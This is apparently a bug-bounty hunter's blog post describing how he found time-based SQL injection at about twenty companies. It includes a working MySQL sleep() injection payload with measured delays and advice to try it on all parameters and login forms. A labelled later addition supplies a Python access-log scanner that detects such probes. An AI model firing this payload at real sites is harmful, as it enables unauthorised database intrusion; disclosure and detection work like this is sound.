How I Found SQL Injection on 8x8, Cengage, Comodo, Automattic and 20 Companies

What is SQL injection (SQLi)?

SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is able to access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application’s content or behavior.

I will show you my method for finding SQL injection in one photo. I hacked all these companies this way and reported them on HackerOne and by email to the company.
It is easy to find SQL injection on a website; we just need Burp to test the website. Now look at these photos.

What is this command? Why do we use it?

If you add sleep(12), the response takes 12 seconds before the webpage loads, and if you add sleep(20), the browser and Burp show the response and the page after 20 seconds. The delay scaling with the argument is what shows that the database actually executed the injected expression.

  • 0"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z => 12.508
  • 0"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z => 12.543
  • 0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.523
  • 0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z => 6.565
  • 0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z => 3.518
  • 0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.502
  • 0"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z => 12.491
  • 0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z => 6.508
  • 0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.695

I use this schedule to find SQL injection, and I hacked 20 companies with this method.

Another way to find SQL injection is to put this command in all parameters and login forms.
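The timing pattern above is also what a defender sees in access logs. As an added example that is not part of the original post, the Python below scans constructed log lines (the line format, paths and the /login row are assumptions; the /search timings reuse the values reported above) for sleep() probes and marks a finding as confirmed only when the response time tracks the requested delay, which separates a real time-based injection from a probe that hit a parameterized query:

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample access-log lines (not from the original post), formatted as
# "METHOD PATH?QUERY STATUS RESPONSE_SECONDS". The /search rows reuse the post's
# timings; the /login row sends the same probe to a parameterized query, so no delay occurs.
SAMPLE_LOG = """\
GET /search?q=laptop 200 0.412
GET /search?q=0%22XOR%28if%28now%28%29%3Dsysdate%28%29%2Csleep%2812%29%2C0%29%29XOR%22Z 200 12.508
GET /search?q=0%22XOR%28if%28now%28%29%3Dsysdate%28%29%2Csleep%280%29%2C0%29%29XOR%22Z 200 0.523
GET /search?q=0%22XOR%28if%28now%28%29%3Dsysdate%28%29%2Csleep%286%29%2C0%29%29XOR%22Z 200 6.565
GET /login?user=0%22XOR%28if%28now%28%29%3Dsysdate%28%29%2Csleep%2812%29%2C0%29%29XOR%22Z 200 0.390
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\d{3}) ([\d.]+)$")
# MySQL sleep(N): N is the delay in seconds the probe asks the database to add.
SLEEP_RE = re.compile(r"\bsleep\s*\(\s*(\d+(?:\.\d+)?)\s*\)", re.IGNORECASE)

def parse_line(line):
    """Split a log line into path, percent-decoded query parameters and timing."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    url = urlparse(m.group(2))
    return {"path": url.path, "secs": float(m.group(4)),
            "params": parse_qs(url.query, keep_blank_values=True)}

def flag_time_based_probe(entry, tolerance=1.0):
    """Return a finding if a parameter carries sleep(N). It is 'confirmed' only when
    the response time tracks N; a sleep(0) baseline or a fast reply never confirms."""
    for name, values in entry["params"].items():
        for value in values:
            m = SLEEP_RE.search(value)
            if m is None:
                continue
            requested = float(m.group(1))
            confirmed = requested > 0 and abs(entry["secs"] - requested) <= tolerance
            return {"path": entry["path"], "param": name,
                    "requested_delay": requested, "confirmed": confirmed}
    return None

def scan(log_text):
    """Run the check over every parseable line and collect findings in order."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        finding = flag_time_based_probe(entry) if entry else None
        if finding:
            findings.append(finding)
    return findings
```

A confirmed finding means the delay reached the database, which is the signal to fix the query with parameterization; unconfirmed probes still show which endpoints are being tested.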

I’m here


https://hackerone.com/lu3ky-13

https://twitter.com/lu3ky13
